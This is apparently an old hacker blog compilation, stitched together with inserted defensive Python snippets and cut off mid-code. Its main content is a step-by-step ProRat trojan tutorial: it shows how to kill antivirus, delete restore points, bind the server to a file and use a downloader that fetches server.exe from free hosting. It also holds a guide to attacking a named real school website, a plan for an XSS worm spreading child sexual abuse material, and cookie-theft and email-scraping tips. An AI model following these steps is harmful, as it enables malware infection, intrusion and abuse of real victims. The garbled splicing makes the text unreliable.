Take a social networking website that has an XSS exploit:
The exploit allows the attacker to run whatever JavaScript they want to. So,
if they use JS to direct their browser to send a message to someone, or they
implant the JS into their profile, it will spread like a virus. Then give it
a timed or triggered payload and BAM, CP on everyone's profile page!
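Session hijacking with stolen cookies and the profile XSS above are one chain, and the server breaks it in two places: encode untrusted output so the planted script never runs, and mark the session cookie so a script that does run cannot read it. The Python below is an added example, not part of this guide; the function names and the sample payload are constructed.

```python
import html
from http import cookies

# Constructed payload: a script tag planted in a profile field, the kind of
# thing the worm described above would carry.
PAYLOAD = '<script>alert(document.cookie)</script>'


def render_profile_unsafe(display_name: str) -> str:
    """Vulnerable form: user input concatenated straight into the page."""
    return f"<h1>{display_name}</h1>"


def render_profile(display_name: str) -> str:
    """Hardened form: HTML-encode the untrusted value before it reaches the DOM."""
    return f"<h1>{html.escape(display_name, quote=True)}</h1>"


def session_set_cookie(token: str) -> str:
    """Build a Set-Cookie header for the session id with defensive attributes."""
    jar = cookies.SimpleCookie()
    jar["session"] = token
    jar["session"]["httponly"] = True    # not readable through document.cookie
    jar["session"]["secure"] = True      # only sent over HTTPS
    jar["session"]["samesite"] = "Lax"   # not attached to cross-site POSTs
    jar["session"]["path"] = "/"
    return jar.output(header="Set-Cookie:")


def cookie_is_hardened(set_cookie_header: str) -> bool:
    """Check that a Set-Cookie header carries all three protective attributes."""
    attrs = {part.strip().split("=", 1)[0].lower()
             for part in set_cookie_header.split(";")}
    return {"httponly", "secure", "samesite"} <= attrs


if __name__ == "__main__":
    print(render_profile_unsafe(PAYLOAD))   # script survives: exploitable
    print(render_profile(PAYLOAD))          # script is inert text
    print(session_set_cookie("constructed-session-id"))
```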
•••••Breaking•Captcha••••••••••
-Some captchas = shit
-others are good, like google (yet all are breakable)
-Use erosion to filter noise (eats away pixels with little density)
-convert to binary image (black and white only)
-segment (pull each letter out)
-if the words are complete words, use dictionary.com (open an http socket
obviously...) to improve accuracy.
•••••Phishing••••••••••••••••••
-use previously written spammers on the target website to proliferate links.
•••••DoS•••••••••••••••••••••••
Really need GOOD information on DoS. A lot of retarded shit out there.
••••••Weak•Spots•••••••••••••••
Weak spots to focus on besides just bandwidth and network software.
ex: searches can tap the CPU harder.
Weakest link theory: there is a bottleneck somewhere. Find it and exploit that
area. If attacking, hit the weakest area; that's fundamental to every attack,
so it goes with DoS too. There are people whose job it is to tie up these
weak areas. This part of the text file needs to go over how to find them.
Like with the Subeta raid, and how they used the forgot-email service.
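The registration-bot section (automatic IP bans after a number of registrations, proxy rotation to dodge them) and the weak-spots note above (searches and the forgot-email service cost more CPU than a page view) describe the same defensive counter from opposite sides: per-source accounting over a sliding window, weighted by how expensive each endpoint is. The Python below is an added example, not from this guide; the log format, endpoint costs and thresholds are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed cost weights: the more CPU a handler burns, the more of a
# client's per-minute budget one call consumes.
ENDPOINT_COST = {"/register": 1.0, "/search": 4.0, "/forgot_password": 5.0}
DEFAULT_COST = 0.5


class AbuseDetector:
    """Sliding-window accounting of requests per source address."""

    def __init__(self, window_seconds=60, register_limit=5, budget=20.0):
        self.window = timedelta(seconds=window_seconds)
        self.register_limit = register_limit
        self.budget = budget
        self.events = defaultdict(deque)  # ip -> deque of (timestamp, path)

    def observe(self, ip, path, ts):
        """Record one request; return the names of any rules it trips."""
        q = self.events[ip]
        q.append((ts, path))
        while q and ts - q[0][0] > self.window:   # drop events outside the window
            q.popleft()
        alerts = []
        registrations = sum(1 for _, p in q if p == "/register")
        if registrations > self.register_limit:
            alerts.append("registration_flood")
        spent = sum(ENDPOINT_COST.get(p, DEFAULT_COST) for _, p in q)
        if spent > self.budget:
            alerts.append("cost_budget_exceeded")
        return alerts


def parse_line(line):
    """Constructed log format: '<ISO timestamp> <ip> <method> <path>'."""
    ts_s, ip, _method, path = line.split()[:4]
    return datetime.strptime(ts_s, "%Y-%m-%dT%H:%M:%S"), ip, path


def scan(lines, **kwargs):
    """Run the detector over log lines; return {ip: set of tripped rules}."""
    det = AbuseDetector(**kwargs)
    flagged = {}
    for line in lines:
        ts, ip, path = parse_line(line)
        for rule in det.observe(ip, path, ts):
            flagged.setdefault(ip, set()).add(rule)
    return flagged


# Constructed sample: one source mass-registering, one hammering search,
# one ordinary visitor, then a late registration that falls outside the window.
SAMPLE_LOG = (
    [f"2008-07-28T19:12:0{i} 203.0.113.7 POST /register" for i in range(1, 7)]
    + ["2008-07-28T19:12:10 192.0.2.5 GET /profile",
       "2008-07-28T19:12:11 192.0.2.5 GET /search"]
    + [f"2008-07-28T19:12:2{i} 198.51.100.9 GET /search" for i in range(6)]
    + ["2008-07-28T19:14:30 203.0.113.7 POST /register"]
)

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, sorted(rules))
```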
•••••R00ting•••••••••••••••••••
Need a good guide on this
•••••Stealing•Information••••••
Using wget to steal thousands of Yahoo emails and any other
information to spider-bot out of them.
•••Resources•••••••••••••••••••
For the shitpile noob: NO THERE ARE NO FLASHING PROGRAMS THAT HACK SHIT. THERE
ARE NO COMMAND LINE PROGRAMS THAT WILL HACK SHIT LIKE FROM WHAT YOU HAVE SEEN
IN A MOVIE. YOU HAVE TO ENGINEER SHIT, THESE TOOLS ARE FOR ENGINEERING.
Also, the /h4ck/ board should be a good resource if you can initiate a good,
thought-provoking conversation about something you have questions on but just
don't get from what Google tells you. Sometimes the answers are out there but they
are too good to be simply found on Google, plus too many idiots have websites that
create a high noise-to-content ratio, making any good information
very well hidden. Plus anything good you ask can be seen by others
who hopefully had the same question; even someone more experienced may brush up
on a certain topic posted. But do not ask stupid shitpile questions like
"what can I do with an IP," or ANY Windows support questions. Support-type
questions like "how do I configure [hacking related tool] to do ______" are
fine.
••••Tools••••••••••••••••••••••
Fiddler2:
Great HTTP debugger (the best, and free too). It runs as a local HTTP proxy
so that it can read your HTTP connection. This is completely transparent and
your connection is no different, other than the fact that you can read it, as
well as decrypt HTTPS connections that you normally wouldn't be able to. Your
browser will give you a certificate warning. To use this HTTP proxy with FF, and
more importantly any HTTP bots that you write, you will need to configure them
to connect to an HTTP proxy running on port 8888.
Firefox Addons:
Modify Headers:
You can use this to modify the "Cookie" header if you steal someone's cookies
from a login-based website and you want to log in to that session.
Firebug:
Find the DOM inspector. Also, lots of helpful tools that are needed. A personal
trick of mine for finding XSS is to have the JS set some random object you see
in the DOM to something like 555, then use Greasemonkey to check if that value is
equal to 555 and have your Greasemonkey script do an alert("XSS found"). BECAUSE
YOU DO NOT WANT THE ENEMY DEVS TO FIND YOUR XSS.
http://www.checker.freeproxy.ru/checker/index.php:
Proxy Checker
••••Links••••••••••••••••••••••
The following links have been checked and cleared for not containing stupid
shit. That is, you will not become more of a retard by visiting these websites,
unlike certain websites. What's worse than not knowing is thinking that you know
something, having spent time learning it, and just being a fucking retard for
having believed it at face value and been spoon-fed utter crap, then sharing it
and passing it on as "real information" to others. So, here be good links;
don't edit in links from crap websites with utter shit:
http://vx.netlux.org/
Great website for the VX scene. Rather, the only one, lulz.
http://vx.netlux.org/lib/static/vdat/ezines1.htm
mostly old zines, but some good reads
http://www.textfiles.com/
again old, but might as well go over some history
http://www.phrack.com/
http://img.7chan.org/pr/
••••Reference••••••••••••••••••
http://www.googleguide.com/advanced_oper...rence.html
Very useful reference.
•••Closure•••••••••••••••••••••
Last tips to reiterate:
-you must know how computers/networking work. You must learn how to program
for that to happen since OS = software. What you want to hack = software.
-stop reading white hat websites for any information. Do your own research.
-do not work your way up the irc. MODS = FAGS
-stay the fuck anonymous.
In the end, Anonymous is for hackers, other than solo. The two just fucking go together. Don't
ruin it with namefagging and don't ruin your life in jail because you made a
mistake. Party van dox people just like we do... start with a screen name. But they
have access to much better infos than we do.
As for the party van... and all other namefags who write disclaimers regarding
their text file as being for educational purposes only: Fuck em.
We are Anonymous.
We are Legion.
We do not Forgive.
We do not Forget.
Posted at Monday, July 28, 2008
ProRat Tutorial (Create Trojan)
*Necr0tox1n's Prorat V1.9Fix2 Tutorial
First things first, you'll need a clean copy of ProRat V1.9; here is a link where you can get it from.
http://www.megaupload.com/?d=QNR1BZ3G
This file includes:
ProRat V1.9
The english help file
Skin packs 1-5
The skin builder
pass: netcrew
password for prorat v1.9: pro
Now you have the necessary files, let's start with the tutorial. Extract ProRat V1.9 and run the ProRat application. We'll start with a ProRat server. Click create near the bottom and a small context menu will come up, for now let's just make a ProRat server, we'll cover the other types later.
The ProRat server is the server the rat communicates with, all the fun trojany things :P
The setup is pretty simple we'll start with the notifications area.
Pro Connective notification-
this is basically the SIN notification. Where it asks for your IP address, just click on the little red half-circle on the side and it will locate your external IP address for you.
Mail notification-
self explanatory: the server will send you an email to tell you the victim has been infected.
ICQ pager-
If you use ICQ you can be notified of infections via that, put in your UIN and when a victim is infected you will be informed via ICQ
CGI-
This connects to a web cgi page and uploads the information when a victim is infected
Choose whichever you like, I usually use email and SIN (Pro connective.)
Ok let's move on to the general settings now.
Server Port-
the port you run your server off of (default 5110). For the most part you don't want to use the default port.
Server password-
Pick a password to ensure only you have access
Victim name-
nothing very important, just so you can send separate people separate servers and be able to identify each, use whatever you want here
Give a fake error message-
when the server is run it displays an error message. You can edit what it says by clicking configure after checking the box.
Melt server-
After the server is installed the server installer is deleted if checked
Kill AV/Firewall-
when the server is run it kills the Anti-virus and Firewall processes to hinder detection if checked
Disable win Xp SP 2..... -
This kills the windows firewall upon execution if checked
Clear windows xp restore points-
This will delete all system restore points to avoid repairing the infected computer if checked
Don't send LAN notifications-
this disables notifications if someone within your network is infected, notifications still work from outside connections just not on LAN if checked
Invisibility-
All three of these settings help to hide the server from the user. I'm not going to explain them, I'll just tell you to leave them all checked
Bind with file-
Allows you to choose a file to bind the server to (this helps prevent detection)
Server extensions-
Pick the extension type that you want
Server icon-
Pick an icon
So you've set all of your settings, now click on create server in the bottom right corner and wait a few moments while the program builds the server. Go find some suckas that will run it and give them the file.
Now back at the main window of ProRat we're going to click on the little check-box next to the R on the bar up top. This step is unnecessary if you didn't use the pro connective notification. This listens for the SIN notifications
Put in the IP address of your victim and the port the server runs on and click connect, you'll be prompted for your password.
Now instead of walking you through this, this is the fun part, playing with your toys, I'll tell you what not to try if you are doing the testing on your own PC
CHAT-
Do not attempt this unless you are prepared for a reboot or you are testing with a server on one computer and the client on another.
FUNNY STUFF-
Avoid close monitor because you won't be able to see what you are doing.
Same with open screensaver
OK, here is the information about the other server types
Downloader server-
(copy pasted from prorat, sorry I'm really tired)
Downloader server's aim is to infect the victim in an easy way. ProRat server is 350 KB but Downloader server is only 2 KB. It is easier to send to your victim.
Downloader server's job is to download and run the real server on the target PC. It downloads the real server quickly and executes the file without asking your victim any questions. When Downloader server is bound with a file, the file's size won't be too big, so your victim will not get suspicious about the size of the file.
If you want to use Downloader server you must have web hosting; you can also use free hosting. After this you must create a normal server and put it into your web hosting area.
Let's say:
You have signed up for a free area from http://www.tripod.lycos.co.uk/signup/signup.phtml and you got web hosting like this "http://members.lycos.co.uk/yourarea/", and you upload the server that you created with the ProRat client to this area.
After you upload your server, your server address will look like "http://members.lycos.co.uk/yourarea/server.exe". Now the only thing you must do is create a Downloader server.
CREATING DOWNLOADER SERVER :
To create a Downloader server you must click on the "Create" button first. A popup menu will appear. Click on the "Create Downloader Server" button and get into the Create Downloader Server menu.
When you type the URL in the Downloader server menu it will be saved automatically, so when you want to create another Downloader server it will save you time.
You have to follow this way:
1-URL :
In the Downloader server menu you have to type the URL for the download process that will be done on the target PC. For example: "http://members.lycos.co.uk/yourarea/server.exe"
2-Bind With a File :
You can bind your server\downloader server with any file you want. You must click on the "Bind the server with a file" button and then the file button will be activated. You can now choose a file to be bound with the server. The extension is not so important; you can see the size of the bound server in the ''Server Size'' part.
3-Server Extension :
You can choose the extension of the Server\Downloader server that you will create. ProRat server supports 5 extensions. You can use these extensions for the server: *.exe - *.scr - *.pif - *.com - *.bat
But only 2 of them support icons; the others don't support the Windows icon service. *.exe and *.scr have icon support, so you can choose an icon for these extensions.
4-Server Icon :
If you choose an extension that has icon support, you can select the one you want to use with the server from the small pictures on the menu, but don't forget icons will make the server size a little bigger than the normal size.
If you want to use these icons click on the ''server icon'' section and select the ''Server icon'' box. Choose one of them and your server will use this icon after created.
If you have done all the settings, you can create the Downloader server. Now you only have to click on the "Create Server" button.
After you have created your Downloader server you can change its name. It will automatically download the real server and run it on the target PC invisibly.
Downloader server will restart itself until it downloads the real server onto the target PC.
Warning: If the target PC gets disconnected while the Downloader server is downloading the real server from the web host, the download will not resume from the last percentage; it will just restart downloading the real server again. If you want a function like resuming the download from a 2 KB program, you won't be behaving fairly towards PRO GROUP.
Create CGI victim List
(copy pasted once again)
What is a Victim List? :
Victim list is a system that will let you view the information sent from the server, just like the email and ICQ notifications. The information sent to your CGI list contains your victim's IP address, port number, password etc., which gives you all the victim's details for connection.
Creating Victim List :
This is one of the biggest differences from other Trojans' CGI notifications. ProRat has the best CGI victim list creator built into its own client. You can adjust everything you want when you are creating your victim list. You don't have to lose time configuring the victim list code like with other CGI victim lists, and you can choose which language you want to use in the CGI victim list.
If you want to create your victim list you must click on the Create button and a popup menu will appear; click on the Create CGI Victim List button and you will see 4 boxes and a Create CGI Files button. The features of the boxes are listed below:
Victim List Password :
If you want your list protected with a password, you must write the password you want to use in the blank box.
CGI Script Name :
You can choose a script name that doesn't contain Turkish characters. If you change the name of the CGI list after you have created it, your CGI victim list will not work. You must change the name when you are creating the file. The default name of your CGI file will be prorat.cgi, and it will be the best solution for this problem.
CGI script Data :
You can choose a script data name that doesn't contain Turkish characters. If you change the name of the .dat file after you have created it, it will not work. You must change the name when you are creating your file. The default name for your script data file is log.dat and it's the best solution for this problem. This script will save the logs coming from the server.
Max Number for List :
This menu will let you view the number of victims in your list. The default number is 100. You can choose any number for this blank, but if you choose a number like 10000, Explorer will work slowly.
After you set up these details, click on the "Create CGI files" button.
How To Use:
To use this CGI victim list tool, you must have a host with CGI support. You can get a free host from these sites:
http://www.netfirms.com
http://www.tripod.lycos.com
After you register an account with a host, you must upload "prorat.cgi" and "log.dat" to your host's cgi-bin folder in ASCII mode. Change the CHMOD for "prorat.cgi" to 755, and change the CHMOD for "log.dat" to 600. If you don't know what CHMOD is, please read the following steps.
INSTALL + IMPORTANT THINGS + FREQUENTLY ASKED QUESTIONS:
1-Find out whether your hosting supports CGI. If it doesn't have CGI support, use another host with CGI support.
2-Upload your files to the cgi-bin folder on your host and don't forget to check them; you should see 2 files in your CGI directory after you upload them.
3-You must upload your files to your host in ASCII mode. If you upload in binary mode your CGI victim list won't work. If you want to solve this problem we recommend you upload with the Cute-FTP program. Professional FTP programs like Cute-FTP can automatically choose the mode for file extensions. If you want more details, search for upload + ASCII + cgi on http://www.google.com
4-Did you set up the CHMOD of the files on your host?
The value of the victim list's main file, "prorat.cgi", must be 755 in CHMOD, and the 'log.dat' value must be 600 in CHMOD.
You can adjust CHMOD after you upload files with Cute-FTP. Right click on the file, click on CHMOD and follow the steps:
prorat.cgi :
Owner permissions :
[X]READ [X]WRITE [X]EXECUTE
Group permissions :
[X]READ [ ]WRITE [X]EXECUTE
Public permissions :
[X]READ [ ]WRITE [X]EXECUTE
log.dat :
Owner permissions :
[X]READ [X]WRITE [ ]EXECUTE
Group permissions :
[ ]READ [ ]WRITE [ ]EXECUTE
Public permissions :
[ ]READ [ ]WRITE [ ]EXECUTE
5-If you say I did all the settings right but my list didn't work:
Did anyone edit your prorat.cgi file after you created it? If you edited your prorat.cgi file your list may not work; create a new CGI file.
6-If you say, I'm typing my password into my CGI victim list but my victim list doesn't open, we think that you have changed the names of your CGI files after you created them, and this may cause this problem.
Don't forget, if you want to change the names of the files you must name them when you are creating the files from the client. But if you are an advanced user you can open "prorat.cgi" with a text editor and edit the settings as you want in "prorat.cgi".
7-If you are typing the correct URL for your victim list but it says "****** named file cannot be found":
If you have a problem like this, maybe you forgot to upload the "log.dat" file to the cgi-bin folder on the host, or you changed the name of the log.dat file after you created it.
8-If you forgot the password that you put on your victim list, create a new one and swap the new prorat.cgi with the older one, and don't forget to note it somewhere.
9-If you have many victims but they don't get listed on your victim list, open prorat.cgi with a text editor, go to the settings part and at $show_list = "xxx"; write a value instead of xxx (the default number for that is "100"); after you set it, upload it and replace the old file. If you say you can't do that, create a new prorat.cgi from the client and type a bigger value for the max number of the list, for example 200.
10-If you say I did all the things but I don't know how to connect to my victim list: type http://yoursite/cgi-bin/prorat.cgi in your browser and you will see your login page. The important point of your CGI URL is that the end of your URL must be the name of your cgi file, prorat.cgi; type it at the end of your URL.
For example, you have an account like http://prorat.netfirms.com and you didn't give the default name prorat.cgi and instead used the name counter.cgi. Your URL should be like this: http://prorat.netfims.com/cgi-bin/counter.cgi
11-If you say I took a host from Tripod but it doesn't give me permission to edit CHMOD manually: that is true, some hosts don't give permission for this, but we can solve this problem with the following steps.
Log in on Tripod's page with your username and password and go to FILE MANAGER. Your files will be shown in a special script page; go to the cgi-bin folder, check the box next to the ProRat cgi file and click on the button at the top left (EDIT). Now delete everything in prorat.cgi, copy the prorat.cgi that is on your PC to your host and save it.
12-If you say I did all the things but I can't upload log.dat: type something in log.dat and try to send it again. After you install your victim list you can delete logs with the button named 'Empty Page'.
13-If you say that you took a free host with CGI support but the hosting company closed your account:
If you have many victims, this traffic can alert the admin of the company, or if you only use the cgi-bin of your account it can alert them too. Now you can open a new account and put up a site with 2-3 pages, put an index and connect to your ex-users, changing the older cgi list link with the online editor.
14-If you didn't create prorat.cgi with the ProRat client and downloaded it from somewhere, or if you want to upload it after a long time, you can change it to binary mode while you are editing it or downloading it. Download the ProRat client and create your own victim list.
15-If you say I tried everything and I did all the things right but my service didn't work:
If your age is under 16:
We recommend you not to use ProRat for a couple of years; instead of using ProRat go and play games or use your computer for education.
If you are older than 16 and your IQ is normal, keep away from the hack world and close your computer...
***************
Sorry about any spelling errors, new keyboard.
"Let's start a riot!"
Current projects:
NE-T forums
http://netcru.freeforums.org
NE-T Crypt FUD
Nuclear RAT tut
How to hack a website
Posted at Monday, July 28, 2008
How to hack a website
First, you want to find out as much about it as you can. So, first, you want to port scan it with nmap (I think it's the best port scanner)
Code:
nmap -sT -O -p 1-250 -vv www.thesiteyouwishtohackgoesrighthere.xxx
So, my example would be.
Code:
nmap -sT -O -p 1-250 -vv www.mchs.gsacrd.ab.ca
By the way, that is my school site, hack it if you want to :P
So, then you should get something like this.
This is my nmap result:
C:\Documents and Settings\Captian falcon\Desktop\Tools\Reconnaissance\nmap-4.68>nmap -sT -O -p 1-250 -vv http://www.mchs.gsacrd.ab.ca
Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-27 19:12 Mountain Daylight Time
Initiating Ping Scan at 19:12
Scanning 199.216.233.173 [2 ports]
Completed Ping Scan at 19:12, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:12
Completed Parallel DNS resolution of 1 host. at 19:12, 0.03s elapsed
Initiating Connect Scan at 19:12
Scanning gsacrd.ab.ca (199.216.233.173) [250 ports]
Discovered open port 80/tcp on 199.216.233.173
Discovered open port 22/tcp on 199.216.233.173
Discovered open port 21/tcp on 199.216.233.173
Completed Connect Scan at 19:13, 24.94s elapsed (250 total ports)
Initiating OS detection (try #1) against gsacrd.ab.ca (199.216.233.173)
WARNING: RST from 199.216.233.173 port 21 -- is this port really open?
WARNING: RST from 199.216.233.173 port 21 -- is this port really open?
WARNING: RST from 199.216.233.173 port 21 -- is this port really open?
WARNING: RST from 199.216.233.173 port 21 -- is this port really open?
WARNING: RST from 199.216.233.173 port 21 -- is this port really open?
WARNING: RST from 199.216.233.173 port 21 -- is this port really open?
Host gsacrd.ab.ca (199.216.233.173) appears to be up ... good.
Scanned at 2008-07-27 19:12:46 Mountain Daylight Time for 27s
Interesting ports on gsacrd.ab.ca (199.216.233.173):
Not shown: 247 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Apple Mac OS X 10.3.X|10.4.X
OS details: Apple Mac OS X 10.3.9 (Panther) (Darwin 7.9.0, PowerPC), Apple Mac OS X 10.3.9 (Panther) - 10.4.7 (Tiger) (Darwin 7.9.0 - 8.7.8, PowerPC)
OS Fingerprint:
OS:SCAN(V=4.68%D=7/27%OT=21%CT=%CU=%PV=N%G=N%TM=488D1D2A%P=i686-pc-windows-
OS:windows)OPS(O1=%O2=%O3=%O4=%O5=%O6=)WIN(W1=0%W2=0%W3=0%W4=0%W5=0%W6=0)EC
OS:N(R=Y%DF=N%TG=40%W=0%O=%CC=N%Q=)T1(R=Y%DF=N%TG=40%S=Z%A=S+%F=AR%RD=0%Q=)
OS:T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)U1(R=N)IE(R=N
OS:)
Read data files from: C:\Documents and Settings\Captian falcon\Desktop\Tools\Reconnaissance\nmap-4.68
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.719 seconds
Raw packets sent: 42 (4348B) | Rcvd: 11 (712B)
Sometimes it will say that the site is down; if so, put -P0 at the end (it's a 0, not an o).
So the example would be.
Code:
nmap -sT -O -p 1-250 -vv www.mchs.gsacrd.ab.ca -P0
Alright, now say that the site has a firewall; that would mean your scan would say 0 open ports :(
But don't worry. It is still possible to get into the site.
So, the next thing you need to do is download netcat.
Then, type this in :P
Code:
nc -vv www.mchs.gsacrd.ab.ca 80
Then, when something pops up, you may need to type
Code:
GET test
Then, you should get something like this.
This is what I got from netcat:
C:\Documents and Settings\Captian falcon\Desktop\Tools\Backdoor Apps\NETCAT>nc -vv http://www.mchs.gsacrd.ab.ca 80
DNS fwd/rev mismatch: docs.mchs.gsacrd.ab.ca != gsacrd.ab.ca
docs.mchs.gsacrd.ab.ca [199.216.233.173] 80 (http) open
GET test
Bad Request
Your browser sent a request that this server could not understand.
Invalid URI in request GET test
Apache/1.3.41 Server at http://www.mchs.gsacrd.ab.ca Port 80
sent 9, rcvd 328: NOTSOCK
Finally, we have most of what we need.
Next, we telnet to all of the open ports (if you get any).
So, if I were to telnet to the open ports, I would get (say I'm telnetting to port 22):
Port 22:
SSH-2.0-OpenSSH_4.7
So, to search for the exploit, I would search SSH then (Ctrl+F) 2.0
I would do that for every port I could find open.
Then, look for some exploits for the server type.
To do that, you would search for the server type and version.
My example would be.
Code:
Apache
Then, (ctrl+f) 1.3.41
Then, edit the exploit so that it works on your site (the one you are hacking), then compile the exploit and run it.
And, if you get a good exploit, you will get into the root of the website, and be able to edit any part of the site you want.
The sky is the limit.
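The banners the post collects by hand (SSH-2.0-OpenSSH_4.7, Apache/1.3.41) are exactly what a defender feeds into an inventory check of their own hosts. The Python below is an added example, not part of the post: it parses such banners and flags services below a minimum version. The minimum versions are a constructed policy for the illustration, not a claim about which releases are vulnerable; hostnames are constructed too.

```python
import re

# Regexes for the two banner shapes quoted in the post: an SSH identification
# string and an Apache error-page footer.
BANNER_PATTERNS = [
    ("OpenSSH", re.compile(r"OpenSSH[_ ](\d+(?:\.\d+)*)")),
    ("Apache", re.compile(r"Apache/(\d+(?:\.\d+)*)")),
]

# Constructed policy floors for this inventory; not a vulnerability claim.
MINIMUM_VERSION = {"OpenSSH": (7, 0), "Apache": (2, 4)}


def version_tuple(text):
    """'1.3.41' -> (1, 3, 41) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def parse_banner(banner):
    """Return (product, version tuple) or None when no known product appears."""
    for product, pattern in BANNER_PATTERNS:
        match = pattern.search(banner)
        if match:
            return product, version_tuple(match.group(1))
    return None


def is_outdated(product, version):
    """True when version is below the policy floor; unknown products pass."""
    floor = MINIMUM_VERSION.get(product)
    if floor is None:
        return False
    width = max(len(version), len(floor))   # (2,4) vs (2,4,1): pad with zeros
    return version + (0,) * (width - len(version)) < floor + (0,) * (width - len(floor))


def audit(host_banners):
    """host_banners: {(host, port): banner}. Returns [(host, port, product, version)]."""
    findings = []
    for (host, port), banner in sorted(host_banners.items()):
        parsed = parse_banner(banner)
        if parsed is None:
            continue                      # unrecognised service: nothing to say
        product, version = parsed
        if is_outdated(product, version):
            findings.append((host, port, product, ".".join(map(str, version))))
    return findings


# Constructed inventory using the banner strings quoted in the post.
SAMPLE = {
    ("www.example.test", 22): "SSH-2.0-OpenSSH_4.7",
    ("www.example.test", 80): "Apache/1.3.41 Server at www.example.test Port 80",
    ("db.example.test", 22): "SSH-2.0-OpenSSH_9.3",
    ("db.example.test", 21): "220 ProFTPD Server ready.",
}

if __name__ == "__main__":
    for host, port, product, version in audit(SAMPLE):
        print(f"{host}:{port} runs {product} {version}, below policy floor")
```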
Services & Solutions for Placing High Risk Accounts
Posted at Thursday, July 17, 2008
Is your own business included in the high risk categories? Is your company hard to place? HighRiskAccount.com can help you with a credit card processor, even if you are running a high risk business such as a casino, the gaming industry, a dating club, multi-level marketing, travel services or another high risk business. HighRiskAccount.com will search its database for a processor that suits your needs; it will not charge an extra cost even though you are in a high risk business or even have bad credit.
HighRiskAccount.com specializes in merchant account processing for large-volume business customers. They have over 10 years of experience in placing high risk accounts. HighRiskAccount.com knows how difficult it can be to get credit card processing for a high risk business. Merchant banks do not want to handle your account no matter how legal and legitimate your business may be. If you want help with your credit card merchant account needs, all you have to do is fill out the online form, and within 1-2 business days their staff representative will contact you for further negotiation.
Protect Yourself from Hackers
Posted at Wednesday, July 09, 2008
Protect Yourself from Hackers
"just wrote this guide to give you some tips of which you may not have heard yet. Hopefully, it won't come to a hacker getting in, but if it does...
Tip 1: Hackers cover their tracks. Experienced hackers cover them more thoroughly, but amateur hackers sometimes leave things behind. Don't expect them to leave any really big evidence behind; expect more of little things here and there you might find surprising. For example, if you're writing a term paper and a black hat hacker accidentally saved it when he took a paragraph out, that's suspicious. Where did that paragraph go? Well, for one thing, now you know he was in that area. Check the folders surrounding the file; you might find something.
Tip 2: Decipher between the types of hackers that are attacking you. Experienced hackers will have a more in-depth look around when they penetrate your system. They won't touch much because they know that won't add too much to their knowledge. But if you know a hacker's been in, and some files are messed with, and you have a log of someone guessing passwords to a file or something of that sort, it's probably some newbie who's just starting out. These are the easiest hackers to catch. They usually get so caught up in thoughts like "I'm in!" that they forget the basics, such as working behind a proxy.
Tip to protect yourself
My friend was setting up a webserver once. His first time too, and he wasn't too anxious to set up some good software to protect against hackers and viruses. He didn't put up one IDS, and before you know it, the obvious happened. But this time, a newbie had struck. The nice log files showed, bluntly across the screen, multiple instances of a foreign IP address that stood out. Some stupid newbie had tried to log in as "uucp" on my friend's XP computer, with a password of "uucp." Well, that's great, but he also had tried the same user/pass combination three times, enough to get himself logged nicely. Even a semi-brainless user with some form of neurological system knows that uucp isn't a default XP account. Again, excitement toiled this hacker's brain, and maybe if he hadn't done that, along with a few other stupid things, he wouldn't have gotten caught. What other things did he do? Well, let's see. He opened 35 instances of MS-DOS. He tried to clean the printer's heads, and he edited a .gif in Notepad. Then he uninstalled a few programs and installed some HTML editor, and replaced four files with the words "14P." He might as well have posted his phone number. In a few days, we had tracked him down to a suburban town in Ohio. We let him go, not pressing any charges, because he had done nothing really damaging and had provided me with an example of a moron for this guide.
Tip 3: Don't go crazy if you lose data. Chances are, if it was that important, you would have backed it up anyway. Most hackers nowadays wish they were back in 1989 when they could use a Black Box and having a Rainbow Book actually meant something. Most hackers aren't blackhat, they are whitehat, and some even greyhat. But in the end, most hackers that are in systems aren't satisfied by looking around. From past experiences, I have concluded that many hackers like to remember where they've been. So, what do they do? They either press delete here and there, or copy some files onto their systems. Stupid hackers (yes, there are plenty of stupid hackers) send files to e-mail addresses. Some free email companies will give you the IP of a certain e-mail address's user if you can prove that user has been notoriously hacking you. But most of the time, by the time you get the e-mail addy it's been unused for weeks if not months or years, and services like Hotmail have already deleted it.
Tip 4: Save information! Any information that you get from a log file (proxy server IP, things like "14P", e-mail addresses that things were sent to, etc.) should be saved to a floppy disk (they're not floppy anymore, I wish I could get out of the habit of calling them that) in case there's a next time. If you get another attack, from the same proxy, or with similar e-mail addresses (e.g.: one says Blackjack 123@something.whatever and the other says Black_jack_45@something.znn.com) you can make an assumption that these hackers are the same people. In that case, it would probably be worth the effort to resolve the IP using the proxy and do a traceroute. Pressing charges is recommended if this is a repeat offender.
Tip 5: Don't be stupid. If you've been hacked, take security to the next level. Hackers do talk about people they've hacked and they do post IPs and e-mail addresses. Proof? Take a look at Defcon Conventions. I've never gone to one, but I've seen the photos. The "Wall of Shame"-type of boards I've seen have IPs and e-mail addresses written all over them in fat red, dry-erase ink. Don't be the one to go searching the Defcon website and find your e-mail address posted on the Wall of Shame board!
Tip 6: Don't rely on luck. Chances are, sometime or another, you're going to be targeted for an attack. Here you can rely on luck. Maybe they'll forget? Maybe they don't know how to do it? If you think this way, a surprise is going to hit your face very hard. Another way you could stupidly rely on luck is by saying this: It's probably just a whitehat. On the contrary, my friend, it's probably just a blackhat. A blackhat with knowledge stored in his head, ready to be used as an ax. It's your data. You take the chance.
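An added example, not part of the original tips: a small Python index of the indicators Tip 4 says to save (proxy IP, e-mail addresses, odd strings like "14P") that links a new attack to earlier ones by the same IP, by the same e-mail handle once digits and punctuation are stripped, or by a recurring string. The IPs, dates and addresses in demo() are constructed for the example.

```python
import json
import re


def normalise_handle(address):
    """Collapse an e-mail address to the letters of its local part, so that
    'Blackjack 123@something.whatever' and 'Black_jack_45@something.znn.com'
    compare equal: digits, spaces and punctuation are what gets varied."""
    local = address.rsplit("@", 1)[0]
    return re.sub(r"[^a-z]", "", local.lower())


class IncidentIndex:
    """The saved 'floppy disk': every incident's proxy IP, e-mail addresses
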